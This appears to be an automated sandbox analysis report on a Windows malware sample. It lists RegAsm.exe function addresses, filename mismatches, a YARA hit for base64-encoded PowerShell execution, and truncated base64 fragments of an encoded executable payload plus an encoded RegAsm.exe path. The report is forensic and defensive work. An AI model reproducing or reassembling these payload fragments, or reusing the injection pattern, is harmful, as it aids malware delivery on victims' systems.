Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 5_2_00446F0B 5_2_00446F0B
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 5_2_00449040 5_2_00449040
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 5_2_0042C070 5_2_0042C070
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 5_2_00401000 5_2_00401000
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 5_2_004111F0 5_2_004111F0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 5_2_0040A240 5_2_0040A240
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 5_2_0040B250 5_2_0040B250
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 5_2_00405270 5_2_00405270
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 5_2_0043E220 5_2_0043E220
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 5_2_004072A0 5_2_004072A0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 5_2_004012A9 5_2_004012A9
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 5_2_00449310 5_2_00449310
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 5_2_00436330 5_2_00436330
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 5_2_004273E9 5_2_004273E9
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 5_2_00448390 5_2_00448390
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 5_2_0042D4EC 5_2_0042D4EC
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 5_2_0044A4F0 5_2_0044A4F0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 5_2_0041E576 5_2_0041E576
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 5_2_004276FE 5_2_004276FE
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 5_2_004036B0 5_2_004036B0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 5_2_0040979B 5_2_0040979B
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 5_2_004138C6 5_2_004138C6
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 5_2_004309E0 5_2_004309E0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 5_2_00410A80 5_2_00410A80
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 5_2_00429A85 5_2_00429A85
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 5_2_00437C40 5_2_00437C40
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 5_2_0042BC00 5_2_0042BC00
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 5_2_00448C00 5_2_00448C00
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 5_2_00407CA0 5_2_00407CA0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 5_2_0040BD60 5_2_0040BD60
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 5_2_0040ADC0 5_2_0040ADC0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 5_2_00431DF0 5_2_00431DF0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 5_2_0042CE40 5_2_0042CE40
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 5_2_00447E60 5_2_00447E60
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 5_2_00443E80 5_2_00443E80
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 5_2_0043EF7E 5_2_0043EF7E
Found potential string decryption / allocating functions
Source: C:\Users\user\Desktop\file.exe Code function: String function: 00832250 appears 55 times
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: String function: 0040C850 appears 49 times
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: String function: 0040EA00 appears 152 times
PE file contains executable resources (Code or Archives)
Source: file.exe Static PE information: Resource name: RT_RCDATA type: PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
Sample file is different than original file name gathered from version info
Source: file.exe Binary or memory string: OriginalFilename vs file.exe
Source: file.exe, 00000000.00000002.1710131079.00000000088E0000.00000002.00000001.00040000.00000003.sdmp Binary or memory string: OriginalFilenameSystem.IO.Compression.dll@ vs file.exe
Source: file.exe, 00000000.00000002.1710131079.00000000088E0000.00000002.00000001.00040000.00000003.sdmp Binary or memory string: OriginalFilenameSystem.IO.MemoryMappedFiles.dll@ vs file.exe
Source: file.exe, 00000000.00000002.1710131079.00000000088E0000.00000002.00000001.00040000.00000003.sdmp Binary or memory string: OriginalFilenameSystem.ObjectModel.dll@ vs file.exe
Source: file.exe, 00000000.00000002.1710131079.00000000088E0000.00000002.00000001.00040000.00000003.sdmp Binary or memory string: OriginalFilenameSystem.Private.CoreLib.dll@ vs file.exe
Source: file.exe, 00000000.00000002.1707445149.0000000000DBD000.00000002.00000001.01000000.00000003.sdmp Binary or memory string: OriginalFilenamemscordaccore.dll@ vs file.exe
Source: file.exe, 00000000.00000002.1707445149.0000000000DBD000.00000002.00000001.01000000.00000003.sdmp Binary or memory string: OriginalFilenameIncrease.dll2 vs file.exe
Source: file.exe, 00000000.00000002.1710381249.00000000090B0000.00000002.00000001.00040000.00000003.sdmp Binary or memory string: OriginalFilenameSystem.ComponentModel.TypeConverter.dll@ vs file.exe
Source: file.exe, 00000000.00000002.1710381249.00000000090B0000.00000002.00000001.00040000.00000003.sdmp Binary or memory string: OriginalFilenameSystem.Diagnostics.Process.dll@ vs file.exe
Source: file.exe, 00000000.00000002.1710402115.00000000090D0000.00000002.00000001.00040000.00000003.sdmp Binary or memory string: OriginalFilenameSystem.Collections.Concurrent.dll@ vs file.exe
Source: file.exe, 00000000.00000002.1710402115.00000000090D0000.00000002.00000001.00040000.00000003.sdmp Binary or memory string: OriginalFilenameSystem.Collections.Immutable.dll@ vs file.exe
Source: file.exe, 00000000.00000002.1710402115.00000000090DB000.00000002.00000001.00040000.00000003.sdmp Binary or memory string: OriginalFilenameSystem.Collections.NonGeneric.dll@ vs file.exe
Source: file.exe, 00000000.00000002.1710402115.00000000090DB000.00000002.00000001.00040000.00000003.sdmp Binary or memory string: OriginalFilenameSystem.ComponentModel.Primitives.dll@ vs file.exe
Source: file.exe, 00000000.00000002.1710639031.0000000009270000.00000002.00000001.00040000.00000003.sdmp Binary or memory string: OriginalFilenameIncrease.dll2 vs file.exe
Source: file.exe Binary or memory string: OriginalFilenamemscordaccore.dll@ vs file.exe
Source: file.exe Binary or memory string: OriginalFilenameIncrease.dll2 vs file.exe
Source: file.exe Binary or memory string: OriginalFilenameMicrosoft.Win32.Registry.dll@ vs file.exe
Source: file.exe Binary or memory string: OriginalFilenameSystem.Collections.Concurrent.dll@ vs file.exe
Source: file.exe Binary or memory string: OriginalFilenameSystem.Collections.Immutable.dll@ vs file.exe
Source: file.exe Binary or memory string: OriginalFilenameSystem.Collections.NonGeneric.dll@ vs file.exe
Source: file.exe Binary or memory string: OriginalFilenameSystem.ComponentModel.Primitives.dll@ vs file.exe
Source: file.exe Binary or memory string: OriginalFilenameSystem.ComponentModel.TypeConverter.dll@ vs file.exe
Source: file.exe Binary or memory string: OriginalFilenameSystem.Diagnostics.Process.dll@ vs file.exe
Source: file.exe Binary or memory string: OriginalFilenameSystem.Diagnostics.StackTrace.dll@ vs file.exe
Source: file.exe Binary or memory string: OriginalFilenameSystem.IO.Compression.dll@ vs file.exe
Source: file.exe Binary or memory string: OriginalFilenameSystem.IO.MemoryMappedFiles.dll@ vs file.exe
Source: file.exe Binary or memory string: OriginalFilenameSystem.ObjectModel.dll@ vs file.exe
Source: file.exe Binary or memory string: OriginalFilenameSystem.Private.CoreLib.dll@ vs file.exe
Source: file.exe Binary or memory string: OriginalFilenameSystem.Reflection.Metadata.dll@ vs file.exe
Source: file.exe Binary or memory string: OriginalFilenameSystem.dll@ vs file.exe
Uses 32bit PE files
Source: file.exe Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
Very long command line found
Source: C:\Users\user\Desktop\file.exe Process created: Commandline size = 10153
Source: C:\Users\user\Desktop\file.exe Process created: Commandline size = 10153 Jump to behavior
Yara signature match
Source: Process Memory Space: powershell.exe PID: 7036, type: MEMORYSTR Matched rule: INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXEC author = ditekSHen, description = Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution
Source: 1.2.powershell.exe.8110000.5.raw.unpack, Program.cs Base64 encoded string: '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
Source: 1.2.powershell.exe.8110000.5.raw.unpack, Mov.cs Base64 encoded string: 'QzpcXFdpbmRvd3NcXE1pY3Jvc29mdC5ORVRcXEZyYW1ld29ya1xcdjQuMC4zMDMxOVxcUmVnQXNtLmV4ZQ=='
Source: 1.2.powershell.exe.8110000.5.raw.unpack, SWFT.cs Base64 encoded string: 'NkxyMHAvcnB6ckRsNmF6dzhwREQ2THIvODY2OW11UzY2YXo3czQzMHFQcW44cnJpOUtydThwREQ2THIvODY2OW11UzY2YXo3czV2b3ArbWc4S3k0MUtmcHJPK203WnJ6NzcvMHF2aTZwc1Nja01QdHZQK2w5S3EyL3FYOHV1N3AxYWo3K0x2TnZPNmhrTVB0a01POTZiM3B2cnZ6K3FEeXA3Mks4cWZnK0x2dW9QS24wS3ppOWFiNXVwRER2ZW0ydmJub3EvR2cvdW5sNmFqcG9QN3AxS2ZpclArOWl2S242NnprNlozeWdQTzlyUCsrLzdEcHJNYVV2Yi8zOGJ6NDViMmc4NzIyN3IzOHUrbUE4NjN6NWVDUXc3M3B2ZW50a01POTZiM3B2ZW0ydmJ2NHZlaTc4K25VOUwzZXB2Ty8rTHZpK0x1em5mS0E4NzJucStIcnFQRzgrT1cyN3IzOHUrbUE4NjN6NWVDbXhKZnB2ZW0yNE1TWHhKZnB2ZW0yN2J6L3BmU3F2YnJpL0wzMHFyMkE4NzJscituZXB2Ty8rTHZpeWFiVXArbjZyK0gwNUwzNGtzRHA2Nmo2Nkt5eDZmU242ZW5sNmFqdnZkU24rYXp1dE1TWDZiM3B2YktibCttOTZiM3B2ZW0yNzZ6cHZPK252WXYvNllyeXArdXM3NzN6NytmSnB0U242ZnFrdGIvOHBlaXNzZW5sNmFqdnZkU24rYXp1dFBLUXc3M3B2ZW5ya01PUXc3M3B2ZW5tNkt2eG9QN3A3cjMzNmFEKzZmK3c2YXpOd09uZXB2Ty8rTHZpeWFiZnNPbXM3dUgvODcyOXYveWw2S3kva01POTZiM3A1c1NjdmVtOTZiM3B2ZW5rK0wzb3UvUHAzNkRpM3FienYvaTc2YXprczQ3NHZkK3c2YXpsdGIvOHBlaXN0UEtibCttOTZiMjBrTU8ydmVtOTZ2aW4rYnZ6K3FEeXA1RERrTU8ydmVtOTZ1K3MrcUQ1OCtuY3VmU0gvS1R6N3NTWDZiM3B2Ym5qLzZYMHFyMjY2YWppOUtxOXV1bTc5S2Z4eHBTOWp2aTkzTG4vMDZqd3JPN2h0TVNjdmVtOTZlYkVsK20ydmVtOTZiM3A3NnppNkx2ejZmT3M2dW5sNmJ2MHAvcVN3TVNjdmVtOTZiM3B2ZW50a01POTZiM3B2ZW0ydmVtOTZiM3I5cXprODZ6eCtxL3JzY1NjdmVtOTZiM3B2ZW0ydmVtOTYvTzkrYVg2ditXUXc3M3B2ZW0ydmVtOTZiM3B2ZXZFK0xyb3BQaWQ5YnZ6L0syLzVaRER2ZW0ydmVtOTZiM3B2ZW0ydjU3eXZxdjl6cXppeWFIdnJQeXQzcWI0NmF6bHZiL2xrTU8ydmVtOTZiM3B2ZW0ydmVtL212aTl5YUhrK0tqNWl2S242YXp1NmV1eHhKZnB2ZW0ydmVtOTZiM3B2ZW0weXFicS82bU8rTDNDOWJ2NHFQbUs4cWZpK0xIcDY3SEVsK20ydmVtOTZiM3B2ZW0ydmV2YXJPbWQ5YnZ6L0szZXB2TzkrTEhpditXUXc3M3B2ZW0ydmVtOTZiM3B2ZXZBOUx2cHZQeWwzS1g2OHFyWXNiL2xrTU8ydmVtOTZiM3B2ZW0ydmVtL251K2c2YXpHNzZiK3JPNjYwS3o3OHJ2azY3SEVsK20ydmVtOTZiM3B2ZW0ydmV2UHJQeXR6YnY1L3F6dXV0Q3M4S2JrNU91eHhKZnB2ZW0ydmVtOTZiM3B2ZW0weDc3SXAvQ283Wi8vK0w3U3I4NnMvcjMvOHFlLzVaRER2ZW0ydmVtOTZiM3B2ZW0ydjRydnJQeTkrSm5rOHFyNHV1Nkl2OFNjdmVtOTZiM3B2ZW5ycHNTWDZiM3B2YlNibCttOTZiM3ErS2Z5NzZ6Nm9QS25rTU9ibCttOTZiM3E3Nnp4OUtiejZkeTU5STN6OGF6NnFPbXM3c1NjdmVtOTZlMjc5TC8zNmF5OXJmaWwrSzczNmF5OW9QTzl2WnZ6N3J6d3JNbWg3NnozK1kzNHBmaXUvTDN6dFlEenZjMjk3K24rL0tmNXBmamdwc1NjdmVtOTZlMjc5TC8zNmF5OXJmaWwrSzczNmF5OXEvS204ZW5GK0wzS3B1ci9xWjMrNzZ6OHJkNm04NzN6NWIzWnJQR3MrcWppK09IVXArbVo2YnUyNmFIdnJQeXRzZW4vODczR2xMMnE4cWZpK0xIcDRLYkVsK20ydmVudHUvUy8vTDN6dmEzNHBmaXUvTDN6dmF2eXB2SHB6cXppeWFIdnJQeXQzcWI0NmF6bHZkbXM4YXp4L0wzNDRkU242Wm5pNytucG9lK3MvSzI2dmFEenZjYVV2YXI1ODczNHNlbmdwc1NjdmVtOTZlMjc5TC8zNmF5OXJmaWwrSzczNmF5OXEvS204ZW5SK0wzS3B1ci9xWjMrNzZ6OHJkNm04NzN6NWIzWnJQR3MrcWppK09IVXArbVo2YnUyNmFIdnJQeXRzZW4vODczR2xMMnE4cWZpK0xIcDRLYkVsK20ydmVudHUvUy8vTDN6dmEzNHBmaXUvTDN6dmF2eXB2SHAycXppeWFIdnJQeXQzcWI0NmF6bHZkbXM4YXp4L0wzNDRkU242Wm5pNytucG9lK3MvSzI2dmFEenZjYVV2YXI1ODczNHNlbmdwc1NjdmVtOTZlMjc5TC8zNmF5OXJmaWwrSzczNmF5OW9QTzl2Wi8vNzczb3FQR0k4YVg1L296bGpmaWwrSzczNmF5MWdQTzl6YjNrdmFIOHAvbWwrT1cyOUtmcDZmeXQrYnZ6N3JxeDZmU242ZW42K0tmNnZmWGx2YUQ0NmVucHNPMnNzZW4vODcyOXVlK202YXoxNmVDbXhKZnB2ZW0yN2J2MHYveTkrT255K0tYNHJ2eTkrT24wOHFieDZjcTc5TDN6MEt6d3B1K3cyYXo2K0s3OHZmamgxS2ZpemIzdjZ
Source: 1.2.powershell.exe.59ac4a8.3.raw.unpack, Program.cs Base64 encoded string: 'TVp4AAEAAAAEAAAAAAAAAAAAAAAAAAAAQAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAeAAAAA4fug4AtAnNIbgBTM0hVGhpcyBwcm9ncmFtIGNhbm5vdCBiZSBydW4gaW4gRE9TIG1vZGUuJAAAUEUAAEwBBADJSPVmAAAAAAAAAADgAAIBCwEOAACmBAAA0AAAAAAAANDOAAAAEAAAAAAAAAAAQAAAEAAAAAIAAAYAAAAAAAAABgAAAAAAAAAAMAYAAAQAAAAAAAACAECFAAAQAAAQAAAAABAAABAAAAAAAAAQAAAAAAAAAAAAAACK5QQAeAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAADgBQBcSAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAArOYEAKgAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAudGV4dAAAAE2lBAAAEAAAAKYEAAAEAAAAAAAAAAAAAAAAAAAgAABgLnJkYXRhAACxKQAAAMAEAAAqAAAAqgQAAAAAAAAAAAAAAAAAQAAAQC5kYXRhAAAAUO8AAADwBAAAXAAAANQEAAAAAAAAAAAAAAAAAEAAAMAucmVsb2MAAFxIAAAA4AUAAEoAAAAwBQAAAAAAAAAAAAAAAABAAABCAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAFWJ5VNXVoPk+IHsaAIAAItFGIlEJCSLXRSLfRCNhCSkAAAA99CJRCRUx0QkTAAAAACJ/usWkJCQkJCQkJCQkJCJxw+2A4n+iAdHQ4l0JBz2wwN0DA+2A+slkJCQkJCQkIsDicL30oHigICAgInBgfElJSUlgcH//v7+hdF0QTwlD4SiAAAAhMCLdCQcD4ThJQAAg30IAHSvifkp8Y1RAYH6AAIAAHygAUwkTFH/dQxW/1UIg8QMhcB1hunXJQAAifkrTCQc6zOQkJCQkJCQkJCJB4PHBItDBIPDBInC99KB4oCAgICJxoH2JSUlJYHG//7+/oPBBIXWdYSNsP/+/v6F8nWCg30IAHTGicqB4v/9//+JzvfWgeYAAgAAKdaD/gR9relW////g8MCidkx2+sSugEAAACQkJCQkJCQkJCQCdNBD7ZB/41w4IP+P3dNugIAAAD/JLVkxUQAugQAAADr3roABAAA69e6AAEAAPfDAAEAAHTKidqB4gAIAACBwgAIAADruroIAAAA67O6QAAAAOusg8sQD7YB6wFJiVwkBDwqi3QkHHUUi0QkJIsYg8AEiUQkJA+2QQFB60eJwoDC0DHbgPoJdzsx25CQkJCQD7bAidqDygqJ3oPmCg+v1oPj9YP2Cg+v8wHWjRwwg8PQD7ZBAUGJwoDC0ID6CnLQi3QkHMdEJAj/////PC51Yw+2QQE8KnUai0QkJIsQiVQkCIPABIlEJCQPtkECg8EC60FBicKAwtDHRCQIAAAAAID6CXcuMfaQkJCQkJCQkJAPtsCNFLaNNFCDxtAPtkEBQYnCgMLQgPoKcuWJdCQIi3QkHA+2wIPAt4P4MYlcJDR3CP8khWTGRABBD7YRicsPtsKDwL+D+DeJXCQoD4d4CQAA/ySFLMdEAPZEJAQgD4VzBAAAi0wkJI1BBDH2iwmA+nUPhG0KAACFyQ+JZQoAAPfZiUwkDItUJASByoAAAADpfgQAAA+2UQGA+mwPhXoEAACDTCQEIIPBAuuOjVkBD7ZRAYP6Mw+E3gkAAIP6Ng+Fev///4B5AjQPhdUJAACDTCQEIIPBA+le////gHkBaA+EPAQAAEGBTCQEAAIAAOlG////i0QkCOmSBQAAvhPARACA+kV0Bb4AwEQAi0QkJN0AuAYAAACLTCQIg/n/dAKJyIlEJAwNAAAAgIPsGIlEJBDdXCQIjUQkWIlEJASNRCR8iQQkjUwkKI1UJDjoDiMAAIPEGIXAdAiBTCQEgAAAAINEJCQIxkQkOADGRCREALAtgHwkBAB4ErAg9kQkBAR1CbAr9kQkBAJ0CcZEJEQBiEQkRYtMJEDHRCQYAAAAAItEJBCB+QBwAACJRCQUD4SrFgAAiUwkMA+2CIiMJKQAAACNjCSlAAAAi0QkDIXAdBwPtg0A8EQAgPH0iIwkpQAAAI2MJKYAAACLRCQMiQwki0wkII1R/znCdgeNSAGJTCQgiUwkGIP5Ag+CtgAAAIl0JAiJwznQcgKJ041z/7oBAAAAg/4HcnCJXCQsid6D5vgx0otcJBSLDCSQkJCQkJAPtkQTAYgEEQ+2RBMCiEQRAQ+2RBMDiEQRAg+2RBMEiEQRAw+2RBMFiEQRBA+2RBMGiEQRBQ+2RBM
Source: 1.2.powershell.exe.59ac4a8.3.raw.unpack, Mov.cs Base64 encoded string: 'QzpcXFdpbmRvd3NcXE1pY3Jvc29mdC5ORVRcXEZyYW1ld29ya1xcdjQuMC4zMDMxOVxcUmVnQXNtLmV4ZQ=='
Source: 1.2.powershell.exe.59ac4a8.3.raw.unpack, SWFT.cs Base64 encoded string: 'NkxyMHAvcnB6ckRsNmF6dzhwREQ2THIvODY2OW11UzY2YXo3czQzMHFQcW44cnJpOUtydThwREQ2THIvODY2OW11UzY2YXo3czV2b3ArbWc4S3k0MUtmcHJPK203WnJ6NzcvMHF2aTZwc1Nja01QdHZQK2w5S3EyL3FYOHV1N3AxYWo3K0x2TnZPNmhrTVB0a01POTZiM3B2cnZ6K3FEeXA3Mks4cWZnK0x2dW9QS24wS3ppOWFiNXVwRER2ZW0ydmJub3EvR2cvdW5sNmFqcG9QN3AxS2ZpclArOWl2S242NnprNlozeWdQTzlyUCsrLzdEcHJNYVV2Yi8zOGJ6NDViMmc4NzIyN3IzOHUrbUE4NjN6NWVDUXc3M3B2ZW50a01POTZiM3B2ZW0ydmJ2NHZlaTc4K25VOUwzZXB2Ty8rTHZpK0x1em5mS0E4NzJucStIcnFQRzgrT1cyN3IzOHUrbUE4NjN6NWVDbXhKZnB2ZW0yNE1TWHhKZnB2ZW0yN2J6L3BmU3F2YnJpL0wzMHFyMkE4NzJscituZXB2Ty8rTHZpeWFiVXArbjZyK0gwNUwzNGtzRHA2Nmo2Nkt5eDZmU242ZW5sNmFqdnZkU24rYXp1dE1TWDZiM3B2YktibCttOTZiM3B2ZW0yNzZ6cHZPK252WXYvNllyeXArdXM3NzN6NytmSnB0U242ZnFrdGIvOHBlaXNzZW5sNmFqdnZkU24rYXp1dFBLUXc3M3B2ZW5ya01PUXc3M3B2ZW5tNkt2eG9QN3A3cjMzNmFEKzZmK3c2YXpOd09uZXB2Ty8rTHZpeWFiZnNPbXM3dUgvODcyOXYveWw2S3kva01POTZiM3A1c1NjdmVtOTZiM3B2ZW5rK0wzb3UvUHAzNkRpM3FienYvaTc2YXprczQ3NHZkK3c2YXpsdGIvOHBlaXN0UEtibCttOTZiMjBrTU8ydmVtOTZ2aW4rYnZ6K3FEeXA1RERrTU8ydmVtOTZ1K3MrcUQ1OCtuY3VmU0gvS1R6N3NTWDZiM3B2Ym5qLzZYMHFyMjY2YWppOUtxOXV1bTc5S2Z4eHBTOWp2aTkzTG4vMDZqd3JPN2h0TVNjdmVtOTZlYkVsK20ydmVtOTZiM3A3NnppNkx2ejZmT3M2dW5sNm